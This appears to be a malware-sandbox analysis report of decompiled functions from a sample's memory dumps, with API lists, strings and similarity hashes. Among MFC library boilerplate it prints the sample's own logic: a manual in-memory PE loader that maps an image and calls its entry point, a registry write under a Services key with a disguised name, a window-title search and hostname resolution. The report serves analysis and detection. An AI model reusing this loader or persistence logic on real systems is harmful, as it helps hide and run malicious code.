Instruction ID: d2f2613dfca7d6d7f90c4651122caaab590fcb5cea5d41ec1da91b5b8676534e
Opcode Fuzzy Hash: 1a19f39ab51fab3e4b5f9f51d1c5c276803f9ae97a759c2700da5930deac3b70
Instruction Fuzzy Hash: 46118F32E0423157D6216AE95C40B2BB6ACAF69B51F15023BEC01F33D4DB78EC09929D

Uniqueness

Uniqueness Score: -1.00%

Function 10005301, Relevance: 9.1, APIs: 6, Instructions: 51
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10005301(struct HWND__* _a4, char* _a8) {
				void _v1027;
				char _v1028;
				void* _t12;
				char* _t19;

				if(IsWindowVisible(_a4) == 0) {
					L4:
					_t12 = 1;
					return _t12;
				}
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1027, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				SendMessageA(_a4, 0xd, 0x400,  &_v1028);
				if(lstrlenA( &_v1028) == 0) {
					goto L4;
				}
				_t19 = _strupr(_a8);
				if(strstr(_strupr( &_v1028), _t19) == 0) {
					goto L4;
				}
				 *0x10027008 = 1;
				return 0;
			}

0x10005315
0x1000538e
0x10005390
0x00000000
0x10005390
0x10005317
0x1000532c
0x1000532e
0x10005330
0x10005342
0x10005358
0x00000000
0x00000000
0x10005364
0x1000537e
0x00000000
0x00000000
0x10005380
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 1000530D
SendMessageA.USER32(?,0000000D,00000400,00000000), ref: 10005342
lstrlenA.KERNEL32(00000000), ref: 1000534F
_strupr.MSVCRT ref: 10005364
_strupr.MSVCRT ref: 1000536F
strstr.MSVCRT ref: 10005373

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
String ID:
API String ID: 850376632-0
Opcode ID: 7856e9d9ba57a5795b0f9597cb7a98207d5190c320cd821c43288e8a7ddbe6af
Instruction ID: 2b98bb0c25043ca3c418cb0e1857ed85d80d11cb4193688d621376b9b1435793
Opcode Fuzzy Hash: 7856e9d9ba57a5795b0f9597cb7a98207d5190c320cd821c43288e8a7ddbe6af
Instruction Fuzzy Hash: 7B01DD726002296FFF119B64DC45BAA7BACFB04394F204476F708F1090DFB1EA469B54

Uniqueness

Uniqueness Score: -1.00%

Function 00416C2C, Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00416C2C(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

APIs

ClientToScreen.USER32(?,?), ref: 00416C3B
GetDlgCtrlID.USER32(00000000), ref: 00416C4F
GetWindowLongA.USER32 ref: 00416C5D
GetWindowRect.USER32 ref: 00416C6F
PtInRect.USER32(?,?,?), ref: 00416C7F
GetWindow.USER32(?,00000005), ref: 00416C8C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 834ef4c14d53aea787e54c4317d745187f2c29fc914ae260d9030daf24c63fc6
Instruction ID: d82dac906f262a072475043fedb3f2b42160409d5295021524ec7a04062182e9
Opcode Fuzzy Hash: 834ef4c14d53aea787e54c4317d745187f2c29fc914ae260d9030daf24c63fc6
Instruction Fuzzy Hash: F401A235500119BBDB21AF58AC08FEF3B2CEF00750F014125FD45D2190E738D9518BD9

Uniqueness

Uniqueness Score: -1.00%

Function 10006C44, Relevance: 9.0, APIs: 6, Instructions: 33
networkCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E10006C44() {
				void* _t17;
				intOrPtr* _t19;
				void* _t25;
				signed int _t26;
				void* _t28;

				E100158AC(E1001A401, _t28);
				 *(_t28 - 0x10) =  *(_t28 - 0x10) & 0x00000000;
				_t26 = 1;
				 *(_t28 - 4) = _t26;
				__imp__#115(0x202, _t28 - 0x1a0, _t25);
				_t17 = E1000865D(_t28 + 0xc);
				__imp__#52(_t17);
				_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))));
				__imp__#12( *_t19);
				_push(_t19);
				L10015818();
				 *(_t28 - 0x10) = _t26;
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return  *((intOrPtr*)(_t28 + 8));
			}

0x10006c49
0x10006c54
0x10006c61
0x10006c68
0x10006c6b
0x10006c74
0x10006c7a
0x10006c83
0x10006c87
0x10006c90
0x10006c91
0x10006c96
0x10006c99
0x10006ca0
0x10006cac
0x10006cb4

APIs

__EH_prolog.LIBCMT ref: 10006C49
WSAStartup.WS2_32(00000202,?), ref: 10006C6B
gethostbyname.WS2_32(00000000), ref: 10006C7A
inet_ntoa.WS2_32(?), ref: 10006C87
#537.MFC42(00000000), ref: 10006C91
#800.MFC42(00000000), ref: 10006CA0

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #537#800H_prologStartupgethostbynameinet_ntoa
String ID:
API String ID: 4103243900-0
Opcode ID: 5db9f6eaf315374098ce0db04d307f65f7c71d27fdc8bc12350ea77d1988ba0b
Instruction ID: c54a1df10b81542e0858c6b474d9ecb855bb550b28484c82a0b19ac62a1081e9
Opcode Fuzzy Hash: 5db9f6eaf315374098ce0db04d307f65f7c71d27fdc8bc12350ea77d1988ba0b
Instruction Fuzzy Hash: 6BF01975910628EFDB00DF64C849BDDBB74FB05355F008056F855AB291CBB5AA44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10004A9F, Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004A9F(char* _a4, intOrPtr _a8) {
				char _v264;
				CHAR* _t12;

				wsprintfA( &_v264, "SYSTEM\\CurrentControlSet\\Services\\%s", "Vwxyab Defghijk");
				_t12 = "Remark";
				if(_a8 != 0) {
					_t12 = "Group";
				}
				return E1000D502(0x80000001,  &_v264, _t12, 1, _a4, strlen(_a4), 1);
			}

0x10004aba
0x10004ac7
0x10004acc
0x10004ace
0x10004ace
0x10004afc

APIs

wsprintfA.USER32 ref: 10004ABA
strlen.MSVCRT ref: 10004AD8

Strings

Group, xrefs: 10004ACE
SYSTEM\CurrentControlSet\Services\%s, xrefs: 10004AB4
Remark, xrefs: 10004AC7, 10004AEB
Vwxyab Defghijk, xrefs: 10004AA9

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strlenwsprintf
String ID: Group$Remark$SYSTEM\CurrentControlSet\Services\%s$Vwxyab Defghijk
API String ID: 350797232-3893035047
Opcode ID: e618eaa163b56cf4fa5dc7fedff6221d0eaed4ba8711fa6f244573ff1bf5f9fb
Instruction ID: 343a723a2cdab9ace4a02dc92aa27e9ff0062f9b7d81858a6bd119616ca28b50
Opcode Fuzzy Hash: e618eaa163b56cf4fa5dc7fedff6221d0eaed4ba8711fa6f244573ff1bf5f9fb
Instruction Fuzzy Hash: 47F037B2800114B7EF11DA50ED8AFC63B68EB00354F414095BF0D65055D7B65AD4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 004136E3, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004136E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E0040E67F(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E004277B0(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E0040E67F(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x452820; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E004134FF(_t187, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E004134FF(_t187, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E004134FF(_t187, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E004136A2(__eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E004136A2(__eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E0041136D(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E0041136D(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}

APIs

_memset.LIBCMT ref: 00413711

Strings

@, xrefs: 004138B6
@, xrefs: 0041381D
AfxFrameOrView80s, xrefs: 004137D7
AfxMDIFrame80s, xrefs: 004137B2

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: a5bef630ddeeebe15989abab7ec30aae97472784829266feab206ff9f3e805df
Instruction ID: e687f1bf12a9c6a9fdbd3b1c6f65c705da800bfc1633e0c8d9dd6433c5c1c0ef
Opcode Fuzzy Hash: a5bef630ddeeebe15989abab7ec30aae97472784829266feab206ff9f3e805df
Instruction Fuzzy Hash: 6D8143B1D0021DAADB50DF98D485BDEBBF8AF04349F20806BFD58E6181E7788B84C794

Uniqueness

Uniqueness Score: -1.00%

Function 00420604, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00420604(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x44f5d0; // 0x8e7de579
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E00420466(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E00420491(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E0042997E(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E004177BE(_t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E004177BE(_t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E0042569C(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 0042062E
lstrlenA.KERNEL32(?), ref: 00420676
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00420690

Strings

System, xrefs: 0042062A

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 38601b7ba2dda2826b863afb526998b0af5bb2d61a90e5abe355db9518e830ad
Instruction ID: 12ab0085a7937c9f5ce84e73a832f34c35628f34696d3be23f28e3815e9ea354
Opcode Fuzzy Hash: 38601b7ba2dda2826b863afb526998b0af5bb2d61a90e5abe355db9518e830ad
Instruction Fuzzy Hash: B6410671E00225DFCB04DFB4D885AAEB7F5FF44304F64812AE412DB286E774A955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 1000BF52, Relevance: 8.9, APIs: 7, Instructions: 113
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000BF52(void* _a4) {
				void* _v8;
				void* __ecx;
				short* _t24;
				intOrPtr* _t25;
				void* _t26;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				intOrPtr* _t44;
				void* _t50;
				void* _t55;
				intOrPtr* _t64;
				intOrPtr* _t68;
				intOrPtr _t69;

				_t24 = _a4;
				if( *_t24 != 0x5a4d) {
					L11:
					_t25 = 0;
				} else {
					_t68 =  *((intOrPtr*)(_t24 + 0x3c)) + _t24;
					if( *_t68 != 0x4550) {
						goto L11;
					} else {
						_t26 = VirtualAlloc( *(_t68 + 0x34),  *(_t68 + 0x50), 0x2000, 4);
						_t50 = _t26;
						if(_t50 != 0) {
							L4:
							_t64 = HeapAlloc(GetProcessHeap(), 0, 0x14);
							 *(_t64 + 4) = _t50;
							 *((intOrPtr*)(_t64 + 0xc)) = 0;
							 *((intOrPtr*)(_t64 + 8)) = 0;
							 *((intOrPtr*)(_t64 + 0x10)) = 0;
							VirtualAlloc(_t50,  *(_t68 + 0x50), 0x1000, 4);
							_v8 = VirtualAlloc(_t50,  *(_t68 + 0x54), 0x1000, 4);
							memcpy(_v8, _a4,  *((intOrPtr*)(_a4 + 0x3c)) +  *(_t68 + 0x54));
							_t35 =  *((intOrPtr*)(_a4 + 0x3c)) + _v8;
							 *_t64 = _t35;
							 *(_t35 + 0x34) = _t50;
							E1000C071(_a4, _t68, _t64);
							_t38 = _t50 !=  *(_t68 + 0x34);
							if(_t50 !=  *(_t68 + 0x34)) {
								E1000C1D7(_t64, _t38);
							}
							_t39 = E1000C251(_t64);
							_pop(_t55);
							if(_t39 == 0) {
								L10:
								E1000C410(_t64);
								goto L11;
							} else {
								E1000C11A(_t55, _t64);
								_t43 =  *((intOrPtr*)( *_t64 + 0x28));
								if(_t43 == 0) {
									L13:
									_t25 = _t64;
								} else {
									_t44 = _t43 + _t50;
									if(_t44 == 0) {
										goto L10;
									} else {
										_push(0);
										_t69 = 1;
										_push(_t69);
										_push(_t50);
										if( *_t44() != 0) {
											 *((intOrPtr*)(_t64 + 0x10)) = _t69;
											goto L13;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							_t50 = VirtualAlloc(_t26,  *(_t68 + 0x50), 0x2000, 4);
							if(_t50 == 0) {
								goto L11;
							} else {
								goto L4;
							}
						}
					}
				}
				return _t25;
			}

0x1000bf56
0x1000bf61
0x1000c063
0x1000c063
0x1000bf67
0x1000bf6a
0x1000bf72
0x00000000
0x1000bf78
0x1000bf86
0x1000bf8c
0x1000bf90
0x1000bfa9
0x1000bfba
0x1000bfc5
0x1000bfc8
0x1000bfcb
0x1000bfce
0x1000bfd5
0x1000bfec
0x1000bffd
0x1000c00f
0x1000c011
0x1000c013
0x1000c016
0x1000c020
0x1000c023
0x1000c027
0x1000c02d
0x1000c02f
0x1000c036
0x1000c037
0x1000c05c
0x1000c05d
0x00000000
0x1000c039
0x1000c03a
0x1000c042
0x1000c047
0x1000c06a
0x1000c06a
0x1000c049
0x1000c049
0x1000c04d
0x00000000
0x1000c04f
0x1000c04f
0x1000c053
0x1000c054
0x1000c055
0x1000c05a
0x1000c067
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c05a
0x1000c04d
0x1000c047
0x1000bf92
0x1000bf9f
0x1000bfa3
0x00000000
0x00000000
0x00000000
0x00000000
0x1000bfa3
0x1000bf90
0x1000bf72
0x1000c070

APIs

VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BF86
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BF99
GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,1000447D,?), ref: 1000BFAD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,1000447D,?), ref: 1000BFB4
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BFD5
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BFE6
memcpy.MSVCRT ref: 1000BFFD

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Alloc$Virtual$Heap$Processmemcpy
String ID:
API String ID: 2335822491-0
Opcode ID: f056624c2e6d2c9ff018f31b41546d2b061f53dd81fe663b22a45062f71b5ea1
Instruction ID: 37658f65aceb3ecc4944179f2fee400f17a622294f4f2746cf3e5f8347aa04b8
Opcode Fuzzy Hash: f056624c2e6d2c9ff018f31b41546d2b061f53dd81fe663b22a45062f71b5ea1
Instruction Fuzzy Hash: 51315971601705EFE3509FA9CC85E667BA8EB48B94F104429FA05D7291D7B1E850DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041871A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041871A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t75;
				void* _t78;

				_t77 = __esi;
				_t76 = __edi;
				_t75 = __edx;
				_push(0x20);
				E00427243(E0043A8F2, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t78 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43f1f4;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t78 - 4) = 2;
				 *((intOrPtr*)(_t78 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E00421664(_t59, _t59 + 0x24, _t75, _t76);
						E00421C36(_t59 + 0x64);
						 *(_t78 - 0x20) =  *(_t78 - 0x20) & 0x00000000;
						_push(_t78 - 0x20);
						if(E00421DE6(_t59, 0x441e94) >= 0) {
							_t77 = "mfcm80.dll";
							_t76 = _t78 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t78 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t78 - 0x20));
								}
							}
							_t45 =  *(_t78 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t78 - 4) = 1;
						E00421A04(_t59 + 0x40);
						 *(_t78 - 4) = 0;
						E00421839(_t59, _t59 + 0x24, _t75, _t76);
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E0040CD77(_t59);
						return E004272C6(_t59, _t76, _t77);
					}
					_t76 = _t59 + 0x40;
					do {
						_t77 = E0042194B(_t76);
						_t86 = _t77;
						if(_t77 != 0) {
							E00417EE2(_t77);
							_push(_t77);
							E0040A3F2(_t59, _t75, _t76, _t77, _t86);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t76 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t78 - 0x28)) = _t33;
						_t77 =  *((intOrPtr*)(E0040B523(_t78 - 0x24)));
						if(_t77 != 0) {
							_t54 =  *((intOrPtr*)(_t77 + 4));
							if(_t54 != 0) {
								_t83 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E0042197C(_t76,  *((intOrPtr*)(_t78 - 0x28)));
									E00417EE2(_t77);
									_push(_t77);
									E0040A3F2(_t59, _t75, _t76, _t77, _t83);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t78 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

APIs

